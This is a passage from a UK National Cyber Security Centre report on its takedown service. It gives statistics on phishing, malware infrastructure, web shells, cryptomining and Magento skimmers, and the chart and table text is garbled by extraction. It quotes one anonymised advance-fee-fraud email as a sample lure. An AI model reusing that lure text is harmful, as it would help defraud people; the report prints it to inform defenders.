CloudFlare 1.6 22.1 DigitalOcean 1.4 48.9LiquidWeb 1.6 0.3 Velocity Servers 1.3 14.8

Network Exchange

Table 2: Comparison of availability of top 10 HMG-related phishing hosters

shows the fruits of their labours.Table 3 and Table 4 shows the top ten brands we removed attacks against in 2017 and 2018.

Brand No. of Attacks No. of Attack Groups Median Availability(hours)

HMRC 16,064 2,466 10gov.uk 1,541 241 15

TV Licensing 172 93 5DVLA 107 53 11

Government Gateway 46 22 6Crown Prosecution Service 43 26 15

University 23 9 0.7Student Loans Company 19 11 17Student Finance Direct 13 3 3

British Broadcasting Corporation 8 7 35

Table 3: Top 10 phishing takedowns in 2017

The top 5 phished brands have remained the same between 2017 and 2018, but they’vechanged in order. HMRC, however, has remained at the top but there has been a very significantimprovement in the number of attacks we see. The university-related phishing attacks all appearto be harvesting credentials for university webmail services and have increased significantly overthe year. We don’t know how the criminals are going to monetise those credentials, but it’spossibly linked to the Student Loans Company-related attacks. Perhaps access to the relevantuniversity mail account is needed as part of some process that helps the criminal, for examplepassword change before bank account change. We will do some work on this.

15

Page 16: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Brand No. of Attacks No. of Attack Groups Median Availability(hours)

HMRC 6,752 1,332 10gov.uk 3,811 771 20

Government Gateway 1,173 318 51DVLA 1,159 315 15

TV Licensing 1,124 185 17British Broadcasting Corporation 21 14 9

Student Loans Company 15 10 14University 1 8 8 2University 2 11 6 12University 3 4 4 0

Table 4: Top 10 phishing takedowns in 2018

2.2.2 Case study: HMRC

HMRC has been running a comprehensive programme to minimize the harm to UK citizensthrough abuse of the HMRC brand and processes. The takedown service is one part of thatprogramme, but is useful as an indicator for how attractive the HMRC brand is to cyber criminals.There has been a dramatic reduction in the number of phishing attacks targeting HMRC overthe past two years. The number of groups we’ve taken down targeting HMRC has fallen by 46%when comparing 2017 and 2018. In figure 3, we plot the number of groups taken down alongsidethe share of global phishing emails that target HMRC. By inspection, the graph shows a verypleasing trend, both in absolute volume and in terms of HMRC’s share of global phishing attacks.

We can use the number of unique IP addresses serving phishing attacks for a given brandas a proxy measure for how interested criminals are in monetising that brand. This is anotherproxy for how difficult it is to make money through attacking a particular brand. Figure 4 showsHMRC’s rank in terms of global brands that are phished between June 2016 and December 2018,based on the totality of data processed by Netcraft. For clarity, the higher the rank, the lessphishing attacks we are seeing, which is a good thing. In June 2016, HMRC was a very populartarget for cyber criminals, being ranked as the 16th most phished brand globally. In December2018 HMRC is ranked as the 146th most phished brand globally. HMRC hasn’t changed its corebusiness and still processes a lot of money, so in principle should still be an attractive target forcriminals. However, the data shows that it isn’t as attractive any more. It’s pretty likely thatthis is a causal result of the work done by HMRC, of which the Takedown Service is one part.As a proof of principle, it seems that we can affect the return on investment for criminals anddemotivate them from attacking things we care about. If government can do it, we can’t see anyreason why businesses whose brands are trusted by the UK public can’t do it.

2.2.3 Government sending malware

One of the ways attackers try to use the HMG brand is by sending email with attachments thatcontain malware, purporting to be from HMG-related addresses. They use either mail serversthat have been specifically set up to perform this task or, more often, using misconfigured mailservers to do their bidding. These misconfigured mail servers are called ‘open relays’ becausethey are configured to allow anyone on the internet to send mail through them, which is ‘a badthing’. When we detect a mail server sending malicious email in the name of HMG, we sendnotifications to the owners of the mail servers asking them to take appropriate action.

16

Page 17: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Jun-1

6

Jul-16

Aug-1

6

Sep-1

6

Oct-1

6

Nov-1

6

Dec-1

6

Jan-1

7

Feb-1

7

Mar-1

7

Apr-1

7

May-1

7

Jun-1

7

Jul-17

Aug-1

7

Sep-1

7

Oct-1

7

Nov-1

7

Dec-1

7

Jan-1

8

Feb-1

8

Mar-1

8

Apr-1

8

May-1

8

Jun-1

8

Jul-18

Aug-1

8

Sep-1

8

Oct-1

8

Nov-1

8

Dec-1

8

0

100

200

300

400

500

Month

No

ofta

ked

own

s

Groups taken down

0.2

0.4

0.6

0.8

1

1.2

Per

centa

ge

of

glo

bal

ph

ish

ing

att

ack

s

Percentage of global phishing attacks

Figure 3: HMRC-related takedowns and share of global phishing.

17

Page 18: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Jun-1

6

Jul-16

Aug-1

6

Sep-1

6

Oct-1

6

Nov-1

6

Dec-1

6

Jan-1

7

Feb-1

7

Mar-1

7

Apr-1

7

May-1

7

Jun-1

7

Jul-17

Aug-1

7

Sep-1

7

Oct-1

7

Nov-1

7

Dec-1

7

Jan-1

8

Feb-1

8

Mar-1

8

Apr-1

8

May-1

8

Jun-1

8

Jul-18

Aug-1

8

Sep-1

8

Oct-1

8

Nov-1

8

Dec-1

8

0

20

40

60

80

100

120

140

160

Month

HM

RC

glob

al

ph

ish

ing

ran

k

Figure 4: HMRC rank as a global phishing target. (Higher is better)

18

Page 19: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Figure 5a shows the volume of mail servers taken down over 2017 and 2018, with figure 5bshowing just the 2018 takedowns.

Jun-1

7

Jul-17

Aug-1

7

Sep-1

7

Oct-1

7

Nov-1

7

Dec-1

7

Jan-1

8

Feb-1

8

Mar-1

8

Apr-1

8

May-1

8

Jun-1

8

Jul-18

Aug-1

8

Sep-1

8

Oct-1

8

Nov-1

8

Dec-1

8

0

10,000

20,000

30,000

Month

Mali

ciou

sm

ail

serv

ers

taken

dow

n

(a) Number of mail servers sending malware in thename of HMG in 2017 and 2018.

Jan

Feb

Mar

Apr

May

Jun

Jul

Aug

Sep

Oct

Nov

Dec

0

500

1,000

1,500

Month (2018)

Mali

ciou

sm

ail

serv

ers

take

nd

own

(b) Number of mail servers sending malware in thename of HMG in 2018.

Figure 5: Mail servers abusing the HMG brand

There was a large spike of malicious mail server takedowns in August and September 2017,which we explained last year. Apart from that, there don’t appear to be any particularly inter-esting features across the data and there was no such spike in 2018. There appear to have beenfewer takedowns in 2018. We are unable to draw any strong conclusions from this, but it appearsthis sort of attack just rumbles on. We should do some recurrence analysis on the mail serversto see if it’s a small population being reused or whether attackers actively hunt new open relays.

2.2.4 Malware infrastructure

When we see malware that is in some way related to an HMG brand, we try to minimize theharm it can cause by taking down the infrastructure that supports it. The types of infrastructurewe take down include :

• Command and control - Once installed, malware needs to be able to receive commands orupload stolen data. We call the place on the internet that a piece of malware talks to its‘command and control URL’ or ‘C2’. Taking down C2 infrastructure ensures that infectedvictim computers can’t talk to the criminals, thereby mitigating some of the harm.

• Distribution site - In some attacks, there are multiple stages to a malware infection, withexisting malware installing new malware as an attack proceeds. The place that the malwareis hosted for download is called a ‘distribution site’. If the distribution site is taken down,the next stage of malware cannot be installed, thereby mitigating some of the potentialharm.

• Payment site - When the malware is actually ransomware, the criminal expects the victimto pay money. The payment site is the place the victim either registers or makes thepayment. Taking down payment sites will prevent the malware distributors profiting fromtheir activities, demotivating them.

19

Page 20: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Figure 6 shows the number of malware infrastructure takedowns performed since June 2017,by attack group. There was a large spike in June 2017 when this service first started, which islikely indicative of the relatively long life of malware infrastructure unless mitigating action istaken to remove it. Data for 2018 was relatively stable until the end of the year, when therewas an increase in the number of attacks involving malware. We do not currently have a goodexplanation as to the uptick at the end of 2018. 2019’s data may provide helpful context.

Jun-1

7

Jul-17

Aug-1

7

Sep-1

7

Oct-1

7

Nov-1

7

Dec-1

7

Jan-1

8

Feb-1

8

Mar-1

8

Apr-1

8

May-1

8

Jun-1

8

Jul-18

Aug-1

8

Sep-1

8

Oct-1

8

Nov-1

8

Dec-1

8

0

100

200

300

400

Month

Att

ack

grou

ps’

mal

war

ein

frast

ruct

ure

take

nd

own

Figure 6: Groups of malware infrastructure taken down

2.2.5 Advance fee fraud

Attackers will often impersonate well-known public sector organisations in order to extract afee from their victims. This could be a deposit to supposedly secure a larger investment or a‘transaction fee’ to transfer a large inheritance. And, of course, lots of people win lottery typethings they never entered as well. We showed an example scam email in last year’s report. Ourresponse to these is to ask the scammer’s email provider to remove access to their account. Whenthey do so, the scammer can’t get any of the details the potential victims have sent, or furtherinteract with them without changing email addresses, which should provide pause for thought inthe victims. Figure 7 shows how many requests for email account takedown we’ve processed. It’snot clear we can draw any conclusions from this. A more useful measure would be the numberof sets of personal details that had been sent to the fraudsters’ email accounts but, as detailedelsewhere, this is hard to get.

Table 5 shows the top brands impersonated by the advance fee fraud we see. Unsurprisingly,the top three impersonated brands all have something to do with money. By allying themselveswith financial institutions, attackers seek to seem more professional and believable when askingfor money - a very similar theme to the phishing attacks which spoof HMG. The volume of

20

Page 21: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Jan-1

7

Feb-1

7

Mar-1

7

Apr-1

7

May-1

7

Jun-1

7

Jul-17

Aug-1

7

Sep-1

7

Oct-1

7

Nov-1

7

Dec-1

7

Jan-1

8

Feb-1

8

Mar-1

8

Apr-1

8

May-1

8

Jun-1

8

Jul-18

Aug-1

8

Sep-1

8

Oct-1

8

Nov-1

8

Dec-1

8

0

100

200

300

400

500

Month

No

email

acco

unts

taken

dow

n

Figure 7: Advance Fee Fraud related email account takedowns.

Brand No Attack Groups 2017 No Attack Groups 2018National Lottery 1,172 1,198

Financial Conduct Authority 743 813Bank of England 73 731

Table 5: Most abused brands for advance fee fraud.

advance fee fraud seems broadly stable, so it’s reasonable to ask if we’re actually having anyeffect on this particular class of attack. The best way to know would be for us or law enforcementto gain access to the criminal’s mailboxes used to communicate with victims. That would allowproper analysis but has obvious issues which we’ve not worked out how to solve yet.

2.2.6 Deceptive domains

Deceptive domains are those registered to try to fool a user into believing they are a legitimatedomain and are normally used for phishing-like attacks, either over messaging (email, social etc)or through search engine optimisation. An example from 2018 is tax-rebate-dvla.co.uk. In 2018,we found 21 deceptive domains that were definitely hosting phishing sites and another 104 thatwere suspicious. The suspicious ones either redirected to a real site (which is very odd andprobably a precursor to doing something bad in the future) or were for services that may or maynot be related to real HMG things. It’s entirely possible that the ‘benign’ sites were part of amuch more stealthy and targeted campaign where the malicious content is hosted on single useURLs under that domain and nothing bad is ever hosted in the root (and stealthy so we don’tsee the phishing lures in email feeds). We’ve no evidence either way, unfortunately. It’s hard totell sometimes and we’re very careful about not taking down good things. In the grand scheme

21

Page 22: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

of things, deceptive domains impersonating HMG related brands still don’t seem to be a massiveproblem.

2.3 Malicious hosting in UK IP space

By taking down phishing and malware attacks when we see them in UK IP space, regardless ofthe brand abused, we intend to make the UK a more difficult place to host these attacks. Whilein and of itself this doesn’t affect the global attacks against the UK, we hope to lead by example.If we can show that a relatively simple set of actions can make a delegated IP space a harderplace to host badness, we can get on our high horse and try to get other responsible countriesand entities to do similar things. Coordinated action would make hosting badness globally muchharder and therefore increase the cost of launching these attacks in the first place and reducethe return on investment. As we said last year, that’s one of the main objectives of the ACDprogramme.

2.3.1 UK IP space phishing

In 2018, we took down 22, 133 phishing campaigns hosted in UK delegated IP space, totalling142, 203 individual attacks. Figure 8 shows the number of attack groups taken down over 2017and 2018.

Jan-1

7

Feb-1

7

Mar-1

7

Apr-1

7

May-1

7

Jun-1

7

Jul-17

Aug-1

7

Sep-1

7

Oct-1

7

Nov-1

7

Dec-1

7

Jan-1

8

Feb-1

8

Mar-1

8

Apr-1

8

May-1

8

Jun-1

8

Jul-18

Aug-1

8

Sep-1

8

Oct-1

8

Nov-1

8

Dec-1

8

1,200

1,400

1,600

1,800

2,000

2,200

2,400

Month

Nu

mb

erof

grou

ps

take

nd

own

Figure 8: The number of attack groups hosted in UK IP space and taken down in 2017 and 2018

Similar to the HMG-related phishing statistics, we show the pre-service baseline availabilitystatistics and statistics for 2017 and 2018 in table 6. Even though this year’s results are slightlyworse than last year’s, comparing the baseline to 2018 figures, UK hosted phishing sites haveless longevity than before we started. There is an obvious harm reduction consequence for this.However, there is not an obvious trend in the number of groups taken down in UK IP space over

22

Page 23: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Measure Baseline Value 2017 Value 2018 ValueMean (hours) 254.8 66.9 125.6

Median (hours) 26.3 3.5 9.1Skewness 6.9 10.2 9.3

25th percentile (hours) 3.2 0.5 1.375th percentile (hours) 173.6 23.0 41.0Sites down in 4 hours 25.9% 56.7% 39.0%Sites down in 24 hours 47.3% 76.8% 69.1%

Table 6: Statistics for baseline, 2017 and 2018 availability of phishing sites in UK IP space

the past two years; if anything it’s broadly constant. However, it would appear that the numberof attacks per group has been rising, as shown in figure 9.

Jan-1

7

Feb-1

7

Mar-1

7

Apr-1

7

May-1

7

Jun-1

7

Jul-17

Aug-1

7

Sep-1

7

Oct-1

7

Nov-1

7

Dec-1

7

Jan-1

8

Feb-1

8

Mar-1

8

Apr-1

8

May-1

8

Jun-1

8

Jul-18

Aug-1

8

Sep-1

8

Oct-1

8

Nov-1

8

Dec-1

8

0

2

4

6

8

Month

Att

acks

per

grou

p

Figure 9: The number of attacks per group hosted in UK IP space in 2017 and 2018

The upward trend of attacks per group appears to be mirrored worldwide, as shown infigure 10.

Even though it appears that criminal hosting behaviour is changing (since the number ofattacks per group is rising) this doesn’t appear to affect the UK’s global share of phishing; thatis, the percentage of all phishing that the UK hosts. Last year, we reported that the UK’s shareof global phishing was falling. We’re pleased to report that this is a trend which continues into2019, as shown in figure 11.

The spike in September is due to a single phishing campaign, hosted by a service which hasfree accounts. In the past, the service in question often hosted malicious attacks unwittingly butmore recently have greatly improved. We believe that the spike in September was just a blipand expect to see the downward trend continue.

23

Page 24: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Jun-1

6

Jul-16

Aug-1

6

Sep-1

6

Oct-1

6

Nov-1

6

Dec-1

6

Jan-1

7

Feb-1

7

Mar-1

7

Apr-1

7

May-1

7

Jun-1

7

Jul-17

Aug-1

7

Sep-1

7

Oct-1

7

Nov-1

7

Dec-1

7

Jan-1

8

Feb-1

8

Mar-1

8

Apr-1

8

May-1

8

Jun-1

8

Jul-18

Aug-1

8

Sep-1

8

Oct-1

8

Nov-1

8

Dec-1

8

0

1

2

3

4

5

6

7

8

9

10

Month

Att

ack

sp

erG

rou

pUK

non-UK

Figure 10: The number of attacks per group worldwide

2.3.2 Web-inject malware in UK IP space

Web-inject malware instances tend to be real sites that have been taken over by attackers inorder to compromise visitors to the site. As the site is genuine, it needs to be fixed ratherthan taken down, which can take longer. In 2018, we notified 1, 362 sites that they had beencompromised, and 1, 287 (or 94.5%) of sites were fixed. Since we’ve been notifying owners andhosters of web-inject malware instances, the number of web-inject malware pages we’ve detectedand asked to be fixed or taken down has fallen steadily, as shown in figure 12. We show bothindividual attacks and attack groups in case the relationship is different to other takedowns.Table 7 shows the statistics for the distribution of the requests for remediation. We believe thisreduction is at least partly due to our intervention as UK-hosted compromised sites become lessprofitable for the criminal because the compromising code is active for a shorter time.

2.4 New types of takedown

2.4.1 Web shells

A web shell is a method for attackers to execute commands remotely on a device and one isoften installed along with other malicious content to provide persistence for an attacker. If themain malicious content is removed, the attacker can use the web shell to reinstall it, or other

24

Page 25: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Jun-1

6

Jul-16

Aug-1

6

Sep-1

6

Oct-1

6

Nov-1

6

Dec-1

6

Jan-1

7

Feb-1

7

Mar-1

7

Apr-1

7

May-1

7

Jun-1

7

Jul-17

Aug-1

7

Sep-1

7

Oct-1

7

Nov-1

7

Dec-1

7

Jan-1

8

Feb-1

8

Mar-1

8

Apr-1

8

May-1

8

Jun-1

8

Jul-18

Aug-1

8

Sep-1

8

Oct-1

8

Nov-1

8

Dec-1

8

0

1

2

3

4

5

Month

UK

-Host

edS

har

eof

Ph

ish

ing

Figure 11: Percentage of phishing hosted in UK delegated IP space.

Measure Baseline Value 2017 Value 2018 ValueMean (hours) 807.2 513.4 885.3

Median (hours) 525.1 39.1 54.7Skewness 3.9 3.2 2.4

25th percentile (hours) 125.8 3.6 4.075th percentile (hours) 1,084.9 340.3 715.2Sites down in 4 hours 3.4% 17.3% 25%Sites down in 24 hours 9.9% 33.8% 40%

Table 7: Statistics for baseline, 2017 and 2018 availability of web-inject sites in UK IP space

malicious content. Some web shells can also run arbitrary code on the compromised machine,allowing for activities such as password cracking and spam campaigns or making the machinepart of a botnet. Depending on how it is placed, a web shell can also allow an attacker to pivotinto the internal network, where they can work to understand how the network is set up and finduser accounts to try to breach. Web shells are used by criminals, but also some more advancedactors. Basically, they’re bad things.

We now automatically commence takedowns against web shells - both those hosted in UKIP space and those that support phishing attacks targeting HMG brands. Figure 13 shows thevolume of takedowns of web shells in 2018. Note that we started the service in late January, andtook down 61 web shells in those few days. We’ve not plotted the January data.

Ignoring the January data point, the number of notifications we’ve sent has been fairly steady.It’s reasonable to make the assumption that the majority of the web shells we see are related tophishing attacks that we see, given how they’re found. Unfortunately, there’s not a significantcorrelation between the number of takedowns of web shells and the related phishing attacks.

25

Page 26: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Jan-1

7

Feb-1

7

Mar-1

7

Apr-1

7

May-1

7

Jun-1

7

Jul-17

Aug-1

7

Sep-1

7

Oct-1

7

Nov-1

7

Dec-1

7

Jan-1

8

Feb-1

8

Mar-1

8

Apr-1

8

May-1

8

Jun-1

8

Jul-18

Aug-1

8

Sep-1

8

Oct-1

8

Nov-1

8

Dec-1

8

0

200

400

600

800

Month

Nu

mb

erof

not

ifica

tion

s

Web-inject GroupsWeb-inject Attacks

Figure 12: Number of web-injects notified in the UK

Feb

Mar

Ap

r

May

Ju

n

Ju

l

Au

g

Sep

Oct

Nov

Dec

0

50

100

150

200

250

Month (2018)

Gro

up

sta

ken

dow

n

Figure 13: Web shells taken down in 2018.

26

Page 27: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

More data may help us understand the real relationship between web shells and other badness.

2.4.2 UK legal system advanced fee fraud

Impersonation of the legal system is used as a common lure in advance fee fraud attacks. Bothbogus law firms, and impersonation of legitimate law firms, are techniques used by fraudsters inan attempt to increase the credibility of their attacks. Increasingly, we’re seeing scammers usereal law firms and other entities to try to make their attacks look more legitimate. If someone ispartially hooked by an email, searching for the law firm or other entities in the mail and findingthey’re real is probably enough to push them over the edge.

We show an example below, where a real priest at a real church and real barrister at a reallaw firm are all used in an attempt to make this story more plausible. We’ve obfuscated thenames - one of them is a lawyer, after all!

Greetings in the name of our Lord Jesus,

I have tried reaching you through a wrong email address on several

occasions without knowing it was wrong. I just discovered your correct

address, which is why my notification is coming late.

I’m pleased to inform you that you were made a beneficiary in the Will of

late Mr. Javier de la Rosa. Please contact the executor of the Will,

Barrister Stephen Bxxxxxxx for more information on how to claim your

inheritance.

Barr. Stephen Bxxxxxxx

[email protected]

+44 000 000 0000

I would appreciate your acknowledgement for receipt of my notification.

Remain blessed in the lord.

Yours Truly,

Rev. Steve xxxxxx

Holy Trinity xxxxx Church,

xxxxx Ln,

xxxxxxxx, XX1 1XX,

United Kingdom

There’s no common brand being abused here, so no-one is incentivised to go after theseattacks. Neither the barrister or the church in the example we use will suffer any loss or harm asa result. Also, given the entities used and the language, this specific attack is obviously directedat UK citizens. In March 2018, Netcraft began taking down these kinds of attacks. Specifically,we started performing takedowns against fraudster email addresses being used in advance feefraud attacks that target UK citizens by using terminology specific to the UK legal system suchas Barrister, Solicitor, Queen’s Counsel, and common chambers used by Barristers. Figure 14shows the volume of takedowns since the service started.

We don’t really have enough data to make any firm conclusions about UK legal system attacksyet, although it’s interesting that we’re seeing a few hundred attacks a month of this flavour.Hopefully we’ll be able to say something more concrete next year.

2.4.3 Non-consensual Monero mining

Monero is an open-source cryptocurrency with a focus on privacy. Due to its use of an ‘ob-fuscated public ledger’, an outside observer cannot track any transactions of the coin, or an

27

Page 28: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Mar

Ap

r

May

Ju

n

Ju

l

Au

g

Sep

Oct

Nov

Dec

0

200

400

600

800

Month (2018)

Gro

up

sta

ken

dow

n

Figure 14: UK legal system related advance fee fraud attacks taken down

account’s balance. This makes it particularly attractive to criminals as transactions are virtuallyuntraceable. Recently JavaScript Monero mining has been discussed as a way of monetisingvisitors to a website in a similar way to advertising. In principle this seems reasonable. However,on the usage we have seen, its primarily a way of monetising hacked sites. We have now startedlooking for Monero mining code on websites hosted in UK delegated IP space. We contact boththe webmaster and the hosting company informing them of the possible compromise and explainto them that if this code hasn’t been added with the webmaster’s knowledge, then the site islikely under the control of a criminal and they should take action to remove the criminal’s codeand secure the site. We’ve had a flurry of responses from webmasters and hosting companies.The majority of these are thanking us for our reports and confirming action has been taken.

However, there have been a few where the webmasters have confirmed the code was inten-tional6. It’s an interesting trend that we should keep an eye on. Figure 15 shows the numberof malicious instances notified for takedown. Again, there’s not enough data yet to draw anystrong conclusions. Interestingly, of the sites hosted in the UK that we’ve found to have Moneromining code, almost 80% do so using Coinhive. The next most common is http://minr.pw/7,which accounts for approximately 5%. The others that we have discovered so far are carboncopies of Coinhive - including utilising the same underlying Monero mining implementation.

2.4.4 Shopping site skimmers

Lots of people use the open source ecommerce package Magento to build their shopping site.Lots of people just install this package as part of their hosting deal and forget about it. Like all

6Originally, we were going to call this ‘criminal Monero mining’. This explains why this section of the paperhas quite a ‘legalese’ title.

7Coinhive and minr.pw are Monero mining services. Coinhive is no longer active at the time of writing.

28

Page 29: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Mar

Ap

r

May

Ju

n

Ju

l

Au

g

Sep

Oct

Nov

Dec

0

50

100

150

200

250

Month (2018)

Mon

ero

inst

ance

sn

otifi

ed

Figure 15: Non-consensual Monero mining instances hosted on UK delegated IP

software, Magento needs patching and people seem to forget that. We’ve seen criminals use thevulnerability of these sites to compromise them and install malicious code in the checkout page.This malicious code just skims the customers’ credit card details as they check out of the realsite. The site owner doesn’t know anything about it - they still have a fully functioning shoppingsite.

29

Page 30: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Jan

Feb

Mar

Ap

r

May

Ju

n

Ju

l

Au

g

Sep

Oct

Nov

Dec

0

200

400

600

800

Month (2018)

Nu

mb

erof

site

sn

oti

fied

AttacksGroups

Figure 16: Number of compromised Magento installations in the UK.

Figure 16 shows the rate of notification of compromised sites. Again, we show both individualattacks and attack groups as the relationship may be different for this sort of attack. Theservice only commenced in March and so the zero values in January and February are due to nowork being done. Funding issues caused a hiatus in the service provision across July, August,September and October, but as the service recommenced in November we see a significant increasein the rate of discovery, suggesting that the service is having a real protective effect. In total,3, 258 sites in 788 attack groups were fixed after notification in 2018, with 97 sites in 26 groupsremaining compromised. Of those 3.0% of sites that remained unmitigated at the end of theyear, most had been compromised for a significant amount of time, probably showing that theowners of the sites were not maintaining them properly. It will be interesting to see how thisprogresses over the next year.

2.5 Hosters’ takedown records

One of the challenges we see is the difference between us notifying a hosting company and thathosting company taking action against malicious content. We can claim lots of goodness in termsof reporting, but if the content isn’t taken down then there’s not much protective effect. So, itwould be interesting to look at those hosting providers who still host things we believe to bemalicious after we’ve notified them, but haven’t told us it’s a false positive, by percentage ofsites available. Given we are looking at percentage of sites reported, it seems reasonable to limitourselves to those hosters to whom we have reported more than 10 malicious sites. Given that,table 8 shows the top 15 hosters, by percentage, that have not removed notified content and havenot claimed a false positive notification.

There are two good things in these data. Firstly, the absolute numbers of recalcitrant domainsare small. Secondly, the percentages involved fall off quickly, suggesting that the vast majority

30

Page 31: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Hoster Percentage Countwebhostingconsultants.com 100.00 12

vTitan 72.50 29Invitel 68.42 13

Hurricane Electric 59.18 29Mail.ru Group 56.36 31AusRegistry 52.00 13

EuroDNS 41.67 20Tencent 30.00 12Bodis 27.61 37

Hostwinds 22.06 15Yahoo! Japan Corporation 19.86 28

Nimbus Hosting 16.98 45British Telecom 14.58 57Nimbus Hosting 9.81 26

Verizon 8.14 129

Table 8: Hosters failing takedowns

of hosters respond well to our requests.

2.6 Deceptive domains

Once again, we have used DNS zone transfers from a large number of TLD zones to find domainname registrations that could be used as deceptive domains, that is domains that are designed todeceive victims into believing they are interacting with a real site. We observe the sites attachedto the domain to see if they are being used for anything malicious. As soon as somethingmalicious is hosted on the site, we commence a takedown.

In 2018, we observed 8, 432 domains that met our search criteria. Of those :

• 5, 147 domains were totally legitimate

• 902 were speculatively registered by ad networks or being held for other reasons

• 779 domains were classed as ‘benign’, but continued to be monitored

• 1, 407 sites were unavailable, with either the domain having been removed already or therebeing no hosting associated with it

• 101 domains were classed as suspicious, and were continually monitored

Of all 8, 432 domains observed in this way in 2018, only 96 were confirmed as phishing sites. The‘benign’ sites are subject to the same caution as described in section 2.2.6.

In the same time frame, we observed 4, 734 SSL certificates on sites that matched our criteria.Of these, 4, 043 were totally legitimate. 58 domains were deemed suspicious and only one (whichturned out to be legitimate) had an Extended Validation certificate. Of the rest, all were DomainValidation certificates with 18 being issued by a cPanel CA and 27 by the Let’s Encrypt CA.Only 3 domains were linked to confirmed phishing sites. Of those, two certificates were issuedby Let’s Encrypt and one by Amazon. They were all domain validation certificates.

Due to the proactive work we do, deceptive domains still don’t appear to be a big problemfor us.

31

Page 32: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

2.7 SSL certificates

We looked at the issuers of all the SSL certificates that are implicated in our takedowns. Table 9details the top 10 issuers for certificates implicated in HMG-related phishing attacks and table 10the same for UK hosted phishing attacks.

Certificate Issuer Certificate CountNo certificate 9,603Let’s Encrypt 2,193cPanel, Inc. 1,455

COMODO CA Limited 435GoDaddy.com, Inc. 391

CloudFlare, Inc. 93DigiCert Inc 66

Symantec Corporation 51Starfield Technologies, Inc. 48

GlobalSign nv-sa 18Site Blindado S.A. 6

Table 9: Top 10 certificate issuers for HMG-related phishing attacks

Certificate Issuer Certificate CountNo certificate 77,709cPanel, Inc. 31,562

Let’s Encrypt 22,573DigiCert Inc 4,430

COMODO CA Limited 4,081GeoTrust Inc. 846

Starfield Technologies, Inc. 546GlobalSign nv-sa 302

Microsoft Corporation 194CloudFlare, Inc. 145

The USERTRUST Network 96

Table 10: Top 10 certificate issuers for UK hosted phishing attacks

This covers both sites that have been compromised in order to host malicious content andsites that have been set up specifically for malfeasance. It’s obvious that the vast majority ofcertificates used are free Domain Validated certificates from Let’s Encrypt or the certificate au-thority associated with the popular cPanel hosting management software. Intuitively, it makessense that malicious actors will be less worried about short-lived certificates than many enter-prises and avoid using identifying or criminally acquired payment instruments where possible.This could explain the propensity of Let’s Encrypt certificates. Similarly, the cPanel CA is as-sociated with a hosting package that we know is often not maintained well by its users, possiblyexplaining the link between compromised sites and cPanel certificates.

32

Page 33: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

2.8 Conclusion

It is obvious that the proactive work undertaken through the Takedown Service continues to havea harm reduction effect at scale. We have shown a consistent reduction in the value to criminalsof hosting malicious content in the UK, and that actively protecting specific government-relatedbrands can reduce the harm caused through their abuse. While there is certainly more to doin the UK, we believe that we have shown sufficient benefit to start asking hard questions ofother governments in terms of their delegated IP space and high value brands in terms of theirinterface with the public.

33

Page 34: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

3 Mail Check

Mail Check is a service to help public sector organisations check and maintain the securityconfiguration of their email infrastructure, including proper DMARC configuration and supportfor email transport encryption. One of the primary goals is to support and encourage adoptionof DMARC, which, along with the SPF and DKIM protocols, is a powerful tool against spoofingand phishing. As described last year, Mail Check helps domain administrators understand theeffects of their email security configurations by performing the hard analysis of all the variousfeedback routes on their behalf, and presenting the results in a user friendly format.

3.1 DMARC and Microsoft

